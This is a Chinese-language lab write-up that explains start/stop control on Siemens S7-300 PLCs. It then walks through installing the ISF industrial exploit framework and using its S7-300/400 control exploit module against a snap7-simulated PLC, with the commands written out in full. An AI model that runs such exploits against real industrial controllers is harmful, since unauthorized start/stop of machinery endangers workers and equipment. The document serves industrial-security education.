目录
什么是西门子启停
西门子S7-300是西门子公司生产的一款模块化可编程逻辑控制器(PLC)产品系列。它用于自动化控制系统中,用于控制和监视机械、过程和工厂设备的运行。S7-300具有灵活的扩展性和强大的功能,可适用于各种不同规模和类型的应用。
"启停"在PLC中是一种常见的控制功能。它指的是控制设备或机器的开启和关闭操作。例如,当按下一个启动按钮时,PLC可以接收到该信号并执行一系列的程序指令,以使设备开始运行;而当按下停止按钮时,PLC则会停止设备的运行。
在S7-300中,启停可以通过编写适当的程序实现。通过配置输入输出模块,将启动和停止按钮连接到适当的输入端口。然后,您可以使用编程软件(如STEP 7)编写逻辑程序,使PLC能够识别输入信号并采取相应的控制动作来控制设备的启停。这些控制动作可以通过输出模块操作设备的电源线路或其他相关控制元件来实现。
西门子S7-300启停是指使用S7-300系列PLC实现对设备或机器的控制,通过适当的输入信号和编写的程序,实现设备的启动和停止功能。
作用
1. 控制电机启停:通过控制启停模块的输出信号,可以实现电机的启动和停止。这对于生产过程中需要频繁启停的机器和设备特别重要,可以提高生产效率和安全性。
2. 实现设备自动化:启停模块可以配合其他传感器和执行器,放置在生产线上,实现自动化生产过程。例如,通过设置传感器检测到产品到达某个位置时,启动设备完成某个生产步骤。
3. 控制设备状态:通过启停模块控制设备的启停,可以监测设备运行状态、加工品质并对设备进行维护和保养。同时,由于设备状态信息可以通过该模块获取,可以帮助生产管理人员更好地了解设备的使用情况,从而改进生产流程及管理。
综上所述,启停模块在西门子S7-300工业自动化控制系统中扮演了重要角色,能够提高生产效率、安全性和设备操作的自动化程度。
实验
通过使用西门子S7-300 PLC,实现一个简单的启停控制系统
1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境
2.kali中安装工控漏洞利用框架 ISF
(1)在kali终端中使用命令:
git clone https://github.com/dark-lbp/isf/
(2)输入cd isf
cd isf
(3)输入python2 isf.py
python2 isf.py
(4)这时有可能会报错:缺少nmap模块,方法:
A.克隆下载nmap模块的包
git config --global http.proxy #添加全局代理
git clone https://github.com/johanlundberg/python-nmap #克隆下载nmap模块的包
B.进入python-nmap文件夹:cd python-nmap,使用命令python2 setup.py install
cd python-nmap
python2 setup.py install
C.进入python2中import nmap发现没有报错了,使用exit()退出
Python2
D.回到上一级文件夹,继续执行 python2 isf.py命令进行安装
cd .. #回到上一级文件夹
python2 isf.py #安装
3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).使用serverdemo.exe模拟PLC设备,用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中
(2)在serverdemo.exe界面先点击start启动server
(3)可以查看到serverdemo.exe下面日志就显示server started
(4)使用clientdemo.exe模拟主机,clientdemo.exe界面上填写上物理机ip
(5)clientdemo.exe界面上点击connect连接
(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)
4.打开ISF后,输入:
use exploits/plcs/siemens/s7_300_400_plc_control
5.
show options
6.
set target #物理机IP
7.
run
实验结果
通过本次实验,学习了Siemens S7-300的启停模块的基本原理和使用方式,并利用ISF工具进行了漏洞利用的实践,成功地控制了PLC设备的启动和停止,加深了对工控安全的了解。